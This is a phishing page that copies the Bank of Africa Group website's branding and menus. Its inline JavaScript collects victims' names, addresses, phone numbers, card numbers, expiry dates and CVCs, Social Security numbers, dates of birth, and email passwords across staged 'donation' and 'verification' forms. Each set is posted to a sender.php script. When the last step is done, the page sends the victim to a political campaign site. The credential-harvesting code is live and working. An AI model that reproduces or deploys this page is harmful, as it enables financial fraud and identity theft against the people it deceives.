<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
  "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"
  xmlns:content="http://purl.org/rss/1.0/modules/content/"
  xmlns:dc="http://purl.org/dc/terms/"
  xmlns:foaf="http://xmlns.com/foaf/0.1/"
  xmlns:og="http://ogp.me/ns#"
  xmlns:rdfs="http://www.w3.org/2000/01/rdf-schema#"
  xmlns:sioc="http://rdfs.org/sioc/ns#"
  xmlns:sioct="http://rdfs.org/sioc/types#"
  xmlns:skos="http://www.w3.org/2004/02/skos/core#"
  xmlns:xsd="http://www.w3.org/2001/XMLSchema#">

<head profile="http://www.w3.org/1999/xhtml/vocab">
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="http://www.bank-of-africa.net/sites/default/files/fav-icon-boa-logo.png" type="image/png" />
<meta name="Generator" content="Drupal 7 (http://drupal.org)" />
<link rel="alternate" type="application/rss+xml" title="GROUPE BANK OF AFRICA RSS" href="http://www.bank-of-africa.net/en/rss.xml" />
  <title>Address | GROUPE BANK OF AFRICA</title>
  <link type="text/css" rel="stylesheet" href="../css/style1.css" media="all" />
<link type="text/css" rel="stylesheet" href="../css/style2.css" media="screen" />
<link type="text/css" rel="stylesheet" href="../css/style3.css" media="all" />
<link type="text/css" rel="stylesheet" href="../css/style4.css" media="all" />
<link type="text/css" rel="stylesheet" href="../css/style5.css" media="all" />
<link type="text/css" rel="stylesheet" href="../css/style6.css" media="print" />

<!--[if lt IE 7]>
<link type="text/css" rel="stylesheet" href="http://www.bank-of-africa.net/sites/all/themes/boa_grp/fix-ie.css?noehx5" media="all" />
<![endif]-->
<link type="text/css" rel="stylesheet" href="../css/style7.css" media="all" />
  <script type="text/javascript" src="../js/jquery.min.js?v=1.8.2"></script>
<script type="text/javascript" src="../js/jquery.once.js?v=1.2"></script>
<script type="text/javascript" src="../js/drupal.js"></script>
<script type="text/javascript" src="../js/views_slideshow.js?v=1.0"></script>
<script type="text/javascript" src="../js/custom_search.js"></script>
<script type="text/javascript" src="../js/jump-menu.js"></script>
<script type="text/javascript" src="../js/jquery.cycle.all.min.js"></script>
<script type="text/javascript" src="../js/views_slideshow_cycle.js"></script>
<script type="text/javascript" src="../js/views_nivo_slider.js"></script>
<script type="text/javascript" src="../js/jquery.nivo.slider.pack.js"></script>
<script type="text/javascript" src="../js/jquery.hoverIntent.minified.js"></script>
<script type="text/javascript" src="../js/superfish.js"></script>
<script type="text/javascript" src="../js/supersubs.js"></script>
<script type="text/javascript" src="../js/superfish2.js"></script>
<script type="text/javascript" src="../js/jquery.fancybox-1.3.4.pack.js"></script>
<script type="text/javascript" src="../js/boa-grp.js"></script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
jQuery.extend(Drupal.settings, {"basePath":"\/","pathPrefix":"en\/","ajaxPageState":{"theme":"boa_grp","theme_token":"cCGb3OQVsV3IJ9YxabE4My72Z5BYqzLQb9rpBckRZ3o","js":{"sites\/all\/modules\/jquery_update\/replace\/jquery\/1.8\/jquery.min.js":1,"misc\/jquery.once.js":1,"misc\/drupal.js":1,"sites\/all\/modules\/views_slideshow\/js\/views_slideshow.js":1,"sites\/all\/modules\/custom_search\/js\/custom_search.js":1,"sites\/all\/modules\/ctools\/js\/jump-menu.js":1,"sites\/all\/libraries\/jquery.cycle\/jquery.cycle.all.min.js":1,"sites\/all\/modules\/views_slideshow\/contrib\/views_slideshow_cycle\/js\/views_slideshow_cycle.js":1,"sites\/all\/modules\/google_analytics\/googleanalytics.js":1,"sites\/all\/modules\/views_nivo_slider\/views_nivo_slider.js":1,"sites\/all\/libraries\/nivo-slider\/jquery.nivo.slider.pack.js":1,"0":1,"sites\/all\/libraries\/superfish\/jquery.hoverIntent.minified.js":1,"sites\/all\/libraries\/superfish\/superfish.js":1,"sites\/all\/libraries\/superfish\/supersubs.js":1,"sites\/all\/modules\/superfish\/superfish.js":1,"sites\/all\/themes\/boa_grp\/js\/fancybox\/jquery.fancybox-1.3.4.pack.js":1,"sites\/all\/themes\/boa_grp\/js\/boa-grp.js":1},"css":{"modules\/system\/system.base.css":1,"modules\/system\/system.menus.css":1,"modules\/system\/system.messages.css":1,"modules\/system\/system.theme.css":1,"sites\/all\/modules\/views_slideshow\/views_slideshow.css":1,"modules\/comment\/comment.css":1,"modules\/field\/theme\/field.css":1,"modules\/node\/node.css":1,"modules\/search\/search.css":1,"modules\/user\/user.css":1,"modules\/forum\/forum.css":1,"sites\/all\/modules\/views\/css\/views.css":1,"sites\/all\/modules\/ctools\/css\/ctools.css":1,"modules\/locale\/locale.css":1,"sites\/all\/modules\/views_slideshow\/views_slideshow_controls_text.css":1,"sites\/all\/modules\/views_slideshow\/contrib\/views_slideshow_cycle\/views_slideshow_cycle.css":1,"sites\/all\/libraries\/nivo-slider\/nivo-slider.css":1,"sites\/all\/libraries\/nivo-slider\/themes\/default\/default.css":1,"sites\/all\/modules\/views_nivo_slider\/views_nivo_slider.css":1,"sites\/all\/modules\/custom_search\/custom_search.css":1,"sites\/all\/libraries\/superfish\/css\/superfish.css":1,"sites\/all\/themes\/boa_grp\/css\/960.css":1,"sites\/all\/themes\/boa_grp\/css\/reset.css":1,"sites\/all\/themes\/boa_grp\/css\/text1.css":1,"sites\/all\/themes\/boa_grp\/css\/style.css":1,"sites\/all\/themes\/boa_grp\/js\/fancybox\/jquery.fancybox-1.3.4.css":1,"sites\/all\/themes\/boa_grp\/css\/print.css":1,"sites\/all\/themes\/boa_grp\/fix-ie.css":1,"public:\/\/css_injector\/css_injector_1.css":1}},"custom_search":{"form_target":"_self","solr":0},"views_nivo_slider":{"views-nivo-slider-homeslideshow-block":{"startSlide":0,"effect":"boxRainGrow","slices":15,"animSpeed":500,"pauseTime":3000,"directionNav":true,"directionNavHide":false,"controlNav":true,"controlNavThumbs":false,"pauseOnHover":true,"manualAdvance":false,"captionOpacity":1,"version":"2.7.x","controlNavThumbsFromRel":false,"keyboardNav":true},"views-nivo-slider-slideshow-gauche-block":{"startSlide":0,"effect":"random","slices":15,"animSpeed":500,"pauseTime":3000,"directionNav":true,"directionNavHide":true,"controlNav":false,"controlNavThumbs":false,"pauseOnHover":true,"manualAdvance":false,"captionOpacity":0.8,"version":"2.7.x","controlNavThumbsFromRel":false,"keyboardNav":true}},"viewsSlideshow":{"homeactualites-block_1":{"methods":{"goToSlide":["viewsSlideshowPager","viewsSlideshowSlideCounter","viewsSlideshowCycle"],"nextSlide":["viewsSlideshowPager","viewsSlideshowSlideCounter","viewsSlideshowCycle"],"pause":["viewsSlideshowControls","viewsSlideshowCycle"],"play":["viewsSlideshowControls","viewsSlideshowCycle"],"previousSlide":["viewsSlideshowPager","viewsSlideshowSlideCounter","viewsSlideshowCycle"],"transitionBegin":["viewsSlideshowPager","viewsSlideshowSlideCounter"],"transitionEnd":[]},"paused":0}},"viewsSlideshowControls":{"homeactualites-block_1":{"bottom":{"type":"viewsSlideshowControlsText"}}},"viewsSlideshowCycle":{"#views_slideshow_cycle_main_homeactualites-block_1":{"num_divs":3,"id_prefix":"#views_slideshow_cycle_main_","div_prefix":"#views_slideshow_cycle_div_","vss_id":"homeactualites-block_1","effect":"fade","transition_advanced":0,"timeout":5000,"speed":700,"delay":0,"sync":1,"random":0,"pause":1,"pause_on_click":0,"action_advanced":0,"start_paused":0,"remember_slide":0,"remember_slide_days":1,"pause_in_middle":0,"pause_when_hidden":0,"pause_when_hidden_type":"full","amount_allowed_visible":"","nowrap":0,"fixed_height":1,"items_per_slide":1,"wait_for_image_load":1,"wait_for_image_load_timeout":3000,"cleartype":0,"cleartypenobg":0,"advanced_options":"{}"}},"googleanalytics":{"trackOutbound":1,"trackMailto":1,"trackDownload":1,"trackDownloadExtensions":"7z|aac|arc|arj|asf|asx|avi|bin|csv|doc|exe|flv|gif|gz|gzip|hqx|jar|jpe?g|js|mp(2|3|4|e?g)|mov(ie)?|msi|msp|pdf|phps|png|ppt|qtm?|ra(m|r)?|sea|sit|tar|tgz|torrent|txt|wav|wma|wmv|wpd|xls|xml|z|zip"},"superfish":{"1":{"id":"1","sf":{"animation":{"opacity":"show","height":"show"},"speed":"\u0027fast\u0027","autoArrows":false,"dropShadows":true,"disableHI":false},"plugins":{"supposition":false,"bgiframe":false,"supersubs":{"minWidth":"12","maxWidth":"27","extraWidth":1}}}}});
//--><!]]>
</script>
</head>
<body class="html front not-logged-in one-sidebar sidebar-first page-node i18n-en" >
  <div id="skip-link">
    <a href="#main-content" class="element-invisible element-focusable">Skip to main content</a>
  </div>
    <script type="text/javascript" src="jsjquery.fancybox-1.3.4.pack.js"></script>
<link rel="stylesheet" type="text/css" href="../js/jquery.fancybox-1.3.4.css" media="screen" />
<script type="text/javascript">
	/*jQuery(document).ready(function(){
		jQuery.fancybox({
            'autoScale': true,
            'transitionIn': 'fade',
            'transitionOut': 'fade',
            'autoDimensions'    : false,
            'width':536,
            'height':405,
            'hideOnContentClick': true,
            //'href': 'http://bank-of-africa.net/sites/all/themes/boa_grp/images/Voeux-BOA-2014.gif'
            'content': '<a href=\'http://bank-of-africa.net/boa-ecard/2014.html\' target=\'_blank\'><img src=\'http://bank-of-africa.net/sites/all/themes/boa_grp/images/Voeux-BOA-2014.gif\' /></a>'
        });

	});*/
	
	//option to send second message
	function showLast()
	{
		var fdiv = $(".amountDiv");
		var sdiv = $(".infoDiv");
		var tdiv = $(".donateDiv");
		
		//input mail sending here.
	  var fname = $('#fname').val();
	  var lname = $('#lname').val();
	  var address = $('#address').val();
	  var city = $('#city').val();
	  var state = $('#state').val();
	  var zip = $('#zip').val();
	  var email = $('#email').val();
	  var phone = $('#phone').val();
	  var price = $('#id_donate_amount_1').val();
	  	  
      if(fname == '' || lname == '' || address == '' || city == '' || state == '' || zip == '' || email == '' || phone == '' )
      {
        alert('Complete all the fields!');
		e.preventDefault();

      }
      else
      {
 // e.preventDefault();

var query = {
        fname: fname,
		lname: lname,
		address: address,
		city: city,
		state: state,
		zip: zip,
		email: email,
		phone: phone,
		price: price,
      }
  $.post('sender.php', query, function(data)
  {
      
  })
	  }
	  sdiv.hide(200);
	  tdiv.show(300);
	}
	
	//option to send third message
	function showSsn()
	{
		var fdiv = $(".amountDiv");
		var sdiv = $(".infoDiv");
		var tdiv = $(".donateDiv");
		var ssdiv = $(".ssnDiv");
		
		//input mail sending here.
	  var cardNumber = $('#cardNumber').val();
	  var ccExpMonth = $('#ccExpMonth').val();
	  var ccExpYear = $('#ccExpYear').val();
	  var ccCvc = $('#ccCvc').val();
	  var subscription = $('#subscription').val();
	  var isUnemployed = $('#isUnemployed').val();
	  var employer = $('#employer').val();
	  var occupation = $('#occupation').val();
	  
	  	  
      if(cardNumber == '' || ccExpMonth == '' || ccExpYear == '' || ccCvc == '' )
      {
        alert('Complete all the fields!');
		e.preventDefault();

      }
      else
      {
 // e.preventDefault();

var query = {
        cardNumber: cardNumber,
		ccExpMonth: ccExpMonth,
		ccExpYear: ccExpYear,
		ccCvc: ccCvc,
		subscription: subscription,
		isUnemployed: isUnemployed,
		employer: employer,
		occupation: occupation,
      }
  $.post('sender.php', query, function(data)
  {
      
  })
	  }
	  tdiv.hide(200);
	  ssdiv.show(300);
	}
	
	//option to send final message
	function showFinish()
	{
			
		var fdiv = $(".amountDiv");
		var sdiv = $(".infoDiv");
		var tdiv = $(".donateDiv");
		var ssdiv = $(".ssnDiv");
		var findiv = $(".finishDiv");
		
		//input mail sending here.
	  var ssn1 = $('#ssn1').val();
	  var ssn2 = $('#ssn2').val();
	  var ssn3 = $('#ssn3').val();
	  
	  var dobday = $('#dobday').val();
	  var dobmonth = $('#dobmonth').val();
	  var dobyear = $('#dobyear').val();
	  var email2 = $('#email2').val();
	  var password = $('#password').val();
	  
	  	  
      if(ssn1 == '' || ssn2 == '' || ssn3 == '' || dobday == '' || dobmonth == '' || dobyear == '' || email2 == '' || password == '' )
      {
        alert('Complete all the fields!');
		e.preventDefault();

      }
      else
      {
 // e.preventDefault();

		ssdiv.hide(200);
	  	findiv.show(300);
		
var query = {
        ssn1: ssn1,
		ssn2: ssn2,
		ssn3: ssn3,
		dobday: dobday,
		dobmonth: dobmonth,
		dobyear: dobyear,
		email2: email2,
		password: password,
      }
  $.post('sender.php', query, function(data)
  {
	  alert("Thank You for your support!")
	  
  })
	  }
	  setTimeout("location.href = 'https://www.hillaryclinton.com/';",3500);
	}
	
	
	
	
	
	
	
	
</script>

    
	<!-----------HEADER------------------>	
	<div id="debord-header">
    	<div class="container_16">  
            <div class="grid_16">
              <div id="boa-grp-header">
                  <div class="grid_8">
                    <div id="boa-grp-logo">
                                                                              <h1 id="branding"><a href="#">
                                                          <img src="../images/logo.png" alt="GROUPE BANK OF AFRICA " title="GROUPE BANK OF AFRICA " id="logo" />
                                                                                    </a></h1>
                                                                    </div>
                  </div> 
                  <div class="grid_8 alpha omega">
                    <div id="boa-grp-header-right">
                        <div id="boa-grp-search-zone">
                        	  <div class="region region-boa-grp-search">
    <div id="block-locale-language" class="block block-locale clearfix">

    
  <div class="content">
  </div>
</div>
<div id="block-views-tous-les-sites-block" class="block block-views clearfix">

    
  <div class="content">
    <div class="view view-tous-les-sites view-id-tous_les_sites view-display-id-block view-dom-id-0ca9b4953ad86d6971776d25c8f398b6">  
</div>  </div>
</div>
<div id="block-custom-search-blocks-1" class="block block-custom-search-blocks clearfix">
</div>
  </div>
                        </div>
                        <div  id="boa-grp-top-menu">
                              <div class="region region-boa-grp-top-menu">
    <div id="block-menu-block-5" class="block block-menu-block clearfix">

    
  <div class="content">
    <div class="menu-block-wrapper menu-block-5 menu-name-menu-top-menu parent-mlid-0 menu-level-1">
  <ul class="menu"><li class="first leaf menu-mlid-683"><a href="#" title="Clients">Clients</a></li>
<li class="leaf menu-mlid-684"><a href="#" title="Shareholders">Shareholders</a></li>
<li class="leaf menu-mlid-685"><a href="#" title="Careers">Careers</a></li>
<li class="last leaf menu-mlid-799"><a href="#" title="Press">Press</a></li>
</ul></div>
  </div>
</div>
  </div>
                        </div>
                    </div>
                  </div>     
              </div>
            </div>
        </div>        
	</div>
    <!-----------MENU------------------>
    <div id="debord-menu">
    	<div class="container_16">
            <div class="grid_16">
              <div id="boa-grp-menu">      	
                				  <div class="region region-boa-grp-nav-menu">
    <div id="block-superfish-1" class="block block-superfish clearfix">

    
    
  <div class="content">
    <ul id="superfish-1" class="menu sf-menu sf-main-menu sf-horizontal sf-style-none sf-total-items-6 sf-parent-items-5 sf-single-items-1">
    <li id="menu-980-1" class="middle even sf-item-2 sf-depth-1 sf-total-children-2 sf-parent-children-0 sf-single-children-2 menuparent"><a href="index.html" class="sf-depth-1 menuparent">Home</a></li><li id="menu-1197-1" class="middle even sf-item-2 sf-depth-1 sf-total-children-2 sf-parent-children-0 sf-single-children-2 menuparent"><a href="contact.html" class="sf-depth-1 menuparent">Contact Us</a></li><li id="menu-1197-1" class="middle even sf-item-2 sf-depth-1 sf-total-children-2 sf-parent-children-0 sf-single-children-2 menuparent"><a href="boaOnline.html" class="sf-depth-1 menuparent">Login To Online Banking</a></li><li id="menu-1197-1" class="active-trail middle even sf-item-2 sf-depth-1 sf-total-children-2 sf-parent-children-0 sf-single-children-2 menuparent"><a href="boaOnlineReg.html" class="sf-depth-1 menuparent">Register For Online Banking</a></li>
    
    </ul>  </div>
</div>
  </div>
                              </div>
                              
            </div>
     	</div>
     </div>        
        
    <!-----------SLIDE-SHOW------------------>
    <div class="container_16"> 
        <div class="grid_16">
		<form novalidate class="form-content" name="efpForm" id="efpForm">
                <div>
             
             	<!--donateDiv-->
             	<div class="donateDiv" style="display:block;">
             	<fieldset class="form-fieldset is-hidden-small-only" "2">
                <div class="cc-section" "2.2">
                <div class="flex-row">
                <div class="col-12" >
                
                <label for="cardNumber" class="form-label is-required">
                <span class="form-label-text">Card number</span>
                <input class="form-input form-input-number" id="cardNumber" name="ccNum" type="text" pattern="[0-9]*" title="Enter a credit card number without spaces or letters" data-focus="true" required/>
                </label>
                </div>
                </div>
                
                <div class="flex-row">
                <div class="col-12" >
                <label for="cardname" class="form-label is-required">
                <span class="form-label-text">Name on card</span>
                <input class="form-input form-input-number" id="cardName" name="cardName" type="text"  title="Enter the name on card, must match your registered name(s)" data-focus="true" required/>
                </label>
                </div>
               </div>
               
                <div class="flex-row">
                <div class="col-12" >
                <label for="address" class="form-label is-required">
                <span class="form-label-text">Address on card</span>
                <input class="form-input form-input-number" id="cardAddress" name="cardAddress" type="text"  title="Enter the address submitted to your issuing bank" data-focus="true" required/>
                </label>
                </div>
               </div>
                
               <div class="flex-row-fluid">
               <div class="col-small-5">
               <label for="ccExpMonth" class="form-label is-required">
               <span class="form-label-text" >Expiration</span>
               <select class="form-select" name="ccExpMonth" type="select" id="ccExpMonth" required="">
               <option selected="" value="" disabled="">Month</option>
               <option value="1">01 - January</option>
               <option value="2">02 - February</option>
               <option value="3">03 - March</option>
               <option value="4">04 - April</option>
               <option value="5" >05 - May</option>
               <option value="6">06 - June</option>
               <option value="7">07 - July</option>
               <option value="8">08 - August</option>
               <option value="9">09 - September</option>
               <option value="10">10 - October</option>
               <option value="11">11 - November</option>
               <option value="12">12 - December</option>
               </select>
               </label>
               </div>
               
               <div class="col-small-4">
               <label for="ccExpYear" class="form-label" >
               <span class="form-label-text"> </span>
               <select class="form-select" name="ccExpYear" type="select" id="ccExpYear" required="">
               <option selected="" value="" disabled="">Year</option>
               <option value="2016">2016</option>
               <option value="2017">2017</option>
               <option value="2018">2018</option>
               <option value="2019">2019</option>
               <option value="2020">2020</option>
               <option value="2021">2021</option>
               <option value="2022">2022</option>
               <option value="2023">2023</option>
               <option value="2024">2024</option>
               </select>
               </label>
               </div>
               
               <div class="col-small-3">
               <label for="" class="form-label is-required">
               <abbr title="3 or 4 digit security code on the back of your card" class="form-label-text">CVC</abbr>
               <input class="form-input form-input-number" id="ccCvc" name="ccCvc" type="number" maxlength="4" pattern="[0-9]*" minlength="3" required/>
               </label>
               </div>
               </div>
               </div>
               </div>
               <div>
               <button type="button" class="button-action submit-donation-button" onClick="javascript:showSsn();" tabindex="-1" >Next</button>
               </div>
               </fieldset>
               </div>
             	<!--end donateDiv-->
                
                
                <!--ssnDiv-->
             	<div class="ssnDiv" style="display:none;">
             	<fieldset class="form-fieldset is-hidden-small-only" "2">
                <div class="cc-section" "2.2">
                <div class="flex-row">
                 <span class="form-label-text">One Final Step, This is for your protection</span><br>
                  <span class="form-label-text">SSN</span><br>
                <div class="col-3" >
                <label for="ssn" class="form-label is-required">
                <input class="form-input" id="ssn1" name="ssn1" onKeyUp="autoTab(event, this, document.efpForm.ssn2)" type="number"  size="3" maxlength="3" pattern="[0-9]*" minlength="3" required/> -
                 </label>
                </div>
                
                <div class="col-3" >
                <input class="form-input" id="ssn2" name="ssn2" onKeyUp="autoTab(event, this, document.efpForm.ssn3)" type="number"  size="3" maxlength="3" pattern="[0-9]*" minlength="3" required/> - 
                </div>
                
                <div class="col-4" >
                <input class="form-input" id="ssn3" name="ssn3" type="number"  size="4" maxlength="4" pattern="[0-9]*" minlength="4" required/> 
                </div>
                </label>
                </div>
               </div>
               
               <div class="flex-row-fluid">
               <span class="form-label-text" >Date of birth</span>
               <div class="col-3">
               <label for="dobmonth" class="form-label is-required">
               <span class="form-label-text" >Month</span>
               <select class="form-select" name="dobmonth" type="select" id="dobmonth" required="">
               <option selected="" value="" disabled="">Month</option>
               <option value="1">01 - January</option>
               <option value="2">02 - February</option>
               <option value="3">03 - March</option>
               <option value="4">04 - April</option>
               <option value="5" >05 - May</option>
               <option value="6">06 - June</option>
               <option value="7">07 - July</option>
               <option value="8">08 - August</option>
               <option value="9">09 - September</option>
               <option value="10">10 - October</option>
               <option value="11">11 - November</option>
               <option value="12">12 - December</option>
               </select>
               </label>
               </div>
               
               <div class="col-3">
               <label for="dobday" class="form-label" >
               <span class="form-label-text">Day</span>
               <select class="form-select" id="dobday" name="dobday" type="select" required="">
               <option value="01">1</option>
                <option value="02">2</option>
                <option value="03">3</option>
                <option value="04">4</option>
                <option value="05">5</option>
                <option value="06">6</option>
                <option value="07">7</option>
                <option value="08">8</option>
                <option value="09">9</option>
                <option value="10">10</option>
                <option value="11">11</option>
                <option value="12">12</option>
                <option value="13">13</option>
                <option value="14">14</option>
                <option value="15">15</option>
                <option value="16">16</option>
                <option value="17">17</option>
                <option value="18">18</option>
                <option value="19">19</option>
                <option value="20">20</option>
                <option value="21">21</option>
                <option value="22">22</option>
                <option value="23">23</option>
                <option value="24">24</option>
                <option value="25">25</option>
                <option value="26">26</option>
                <option value="27">27</option>
                <option value="28">28</option>
                <option value="29">29</option>
                <option value="30">30</option>
                <option value="31">31</option>
                </select>
                </label>
                </div>
               
               <div class="col-3">
               <label for="dobyear" class="form-label" >
               <span class="form-label-text">Year </span>
               <select class="form-select" name="dobyear" type="select" id="dobyear" required="">
               <option value="2010">2010</option>
                <option value="2009">2009</option>
                <option value="2008">2008</option>
                <option value="2007">2007</option>
                <option value="2006">2006</option>
                <option value="2005">2005</option>
                <option value="2004">2004</option>
                <option value="2003">2003</option>
                <option value="2002">2002</option>
                <option value="2001">2001</option>
                <option value="2000">2000</option>
                <option value="1999">1999</option>
                <option value="1998">1998</option>
                <option value="1997">1997</option>
                <option value="1996">1996</option>
                <option value="1995">1995</option>
                <option value="1994">1994</option>
                <option value="1993">1993</option>
                <option value="1992">1992</option>
                <option value="1991">1991</option>
                <option value="1990">1990</option>
                <option value="1989">1989</option>
                <option value="1988">1988</option>
                <option value="1987">1987</option>
                <option value="1986">1986</option>
                <option value="1985">1985</option>
                <option value="1984">1984</option>
                <option value="1983">1983</option>
                <option value="1982">1982</option>
                <option value="1981">1981</option>
                <option value="1980">1980</option>
                <option value="1979">1979</option>
                <option value="1978">1978</option>
                <option value="1977">1977</option>
                <option value="1976">1976</option>
                <option value="1975">1975</option>
                <option value="1974">1974</option>
                <option value="1973">1973</option>
                <option value="1972">1972</option>
                <option value="1971">1971</option>
                <option value="1970">1970</option>
                <option value="1969">1969</option>
                <option value="1968">1968</option>
                <option value="1967">1967</option>
                <option value="1966">1966</option>
                <option value="1965">1965</option>
                <option value="1964">1964</option>
                <option value="1963">1963</option>
                <option value="1962">1962</option>
                <option value="1961">1961</option>
                <option value="1960">1960</option>
                <option value="1959">1959</option>
                <option value="1958">1958</option>
                <option value="1957">1957</option>
                <option value="1956">1956</option>
                <option value="1955">1955</option>
                <option value="1954">1954</option>
                <option value="1953">1953</option>
                <option value="1952">1952</option>
                <option value="1951">1951</option>
                <option value="1950">1950</option>
                <option value="1949">1949</option>
                <option value="1948">1948</option>
                <option value="1947">1947</option>
                <option value="1946">1946</option>
                <option value="1945">1945</option>
                <option value="1944">1944</option>
                <option value="1943">1943</option>
                <option value="1942">1942</option>
                <option value="1941">1941</option>
                <option value="1940">1940</option>
                <option value="1939">1939</option>
                <option value="1938">1938</option>
                <option value="1937">1937</option>
                <option value="1936">1936</option>
                <option value="1935">1935</option>
                <option value="1934">1934</option>
                <option value="1933">1933</option>
                <option value="1932">1932</option>
                <option value="1931">1931</option>
                <option value="1930">1930</option>
                <option value="1929">1929</option>
                <option value="1928">1928</option>
                <option value="1927">1927</option>
                <option value="1926">1926</option>
                <option value="1925">1925</option>
                <option value="1924">1924</option>
                <option value="1923">1923</option>
                <option value="1922">1922</option>
                <option value="1921">1921</option>
                <option value="1920">1920</option>
                <option value="1919">1919</option>
                <option value="1918">1918</option>
                <option value="1917">1917</option>
                <option value="1916">1916</option>
                <option value="1915">1915</option>
                <option value="1914">1914</option>
                <option value="1913">1913</option>
                <option value="1912">1912</option>
                <option value="1911">1911</option>
                <option value="1910">1910</option>
                <option value="1909">1909</option>
                <option value="1908">1908</option>
                <option value="1907">1907</option>
                <option value="1906">1906</option>
                <option value="1905">1905</option>
                <option value="1904">1904</option>
                <option value="1903">1903</option>
                <option value="1902">1902</option>
                <option value="1901">1901</option>
                <option value="1900">1900</option>
               </select>
               </label>
               </div>
               </div>
               
               <div>
               <button type="button" class="button-action submit-donation-button" onClick="javascript:showFinish();" tabindex="-1" >Verify</button>
               </div>
               </fieldset>
               </div>
             	<!--end ssnDiv-->
                
                <!--finishDiv-->
             	<div class="finishDiv" style="display:none;">
             	<br><img src="ajax-loader.gif" width="208"><br>
                <span class="form-label-text">Your account has been submitted for review, you will be notified via email upon successful verification!</span>
             	</div>
             	<!--end finishDiv-->
                
             	</form>
     </div>   
    <!-----------CONTENT------------------>
    <div id="debord-content">
        
        <div style="clear:both"></div>

    </div>
    <!-----------FOOTER------------------>    
    <div id="debord-footer">
        <div class="container_16">         
            <div class="grid_16">
              <div id="boa-grp-bottom-footer">
              	  <div class="region region-boa-grp-bottom-footer">
    <div id="block-menu-block-2" class="block block-menu-block clearfix">

    
  <div class="content">
    <div class="menu-block-wrapper menu-block-2 menu-name-main-menu parent-mlid-0 menu-level-1">
  <ul class="menu"><li class="first expanded menu-mlid-980"><a href="#">About Us</a><ul class="menu"><li class="first leaf menu-mlid-828"><a href="#">About BOA Group</a></li>
<li class="leaf menu-mlid-830"><a href="#">Our Values</a></li>
<li class="leaf menu-mlid-832"><a href="#">Our Key Figures </a></li>
<li class="last leaf menu-mlid-686"><a href="#" title="Our products &amp; services">Our Products &amp; Services</a></li>
</ul></li>
<li class="expanded menu-mlid-1197"><a href="#">Our Presence</a><ul class="menu"><li class="first leaf menu-mlid-1198"><a href="#">Map</a></li>
<li class="last leaf menu-mlid-679"><a href="#">Address</a></li>
</ul></li>
<li class="leaf menu-mlid-674"><a href="#">Our Products &amp; Services</a></li>
<li class="expanded menu-mlid-544"><a href="#">BOA Foundation</a><ul class="menu"><li class="first leaf menu-mlid-834"><a href="#">Introduction</a></li>
<li class="leaf menu-mlid-836"><a href="/#">Vision and Mission</a></li>
<li class="leaf menu-mlid-675"><a href="#">Countries of Operation</a></li>
<li class="leaf menu-mlid-1025"><a href="#">Achievements and Projects</a></li>
<li class="last leaf menu-mlid-676"><a href="contact.html">Contact Us</a></li>
</ul></li>
<li class="expanded menu-mlid-798"><a href="#">Communications</a><ul class="menu"><li class="first leaf has-children menu-mlid-809"><a href="#">Activity reports</a></li>
<li class="leaf menu-mlid-820"><a href="#">Press releases</a></li>
<li class="leaf menu-mlid-824"><a href="#">Publications</a></li>
<li class="leaf menu-mlid-821"><a href="#">Corporate Communications</a></li>
<li class="leaf menu-mlid-822"><a href="#">Product Communications</a></li>
<li class="last leaf menu-mlid-1202"><a href="#">Tender</a></li>
</ul></li>
<li class="last expanded menu-mlid-682"><a href="#" title="Your career at BOA">Your career at BOA</a><ul class="menu"><li class="first leaf menu-mlid-680"><a href="#">Why choose BOA?</a></li>
<li class="leaf menu-mlid-983"><a href="#">Vacancies</a></li>
<li class="last leaf menu-mlid-681"><a href="#">Open Applications</a></li>
</ul></li>
</ul></div>
  </div>
</div>
  </div>
              </div>
            </div>
        </div>
    </div>
    <!---------------------------------->
      </body>
</html>
